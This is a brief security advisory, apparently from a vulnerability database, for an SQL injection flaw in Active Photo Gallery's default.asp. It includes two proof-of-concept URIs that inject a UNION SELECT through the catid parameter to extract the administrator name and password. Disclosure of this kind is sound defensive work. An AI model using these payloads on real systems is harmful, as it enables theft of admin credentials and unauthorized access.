|
Active Photo Gallery Default.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com/default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1 http://www.example.com/default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1 |
|
Privacy Statement |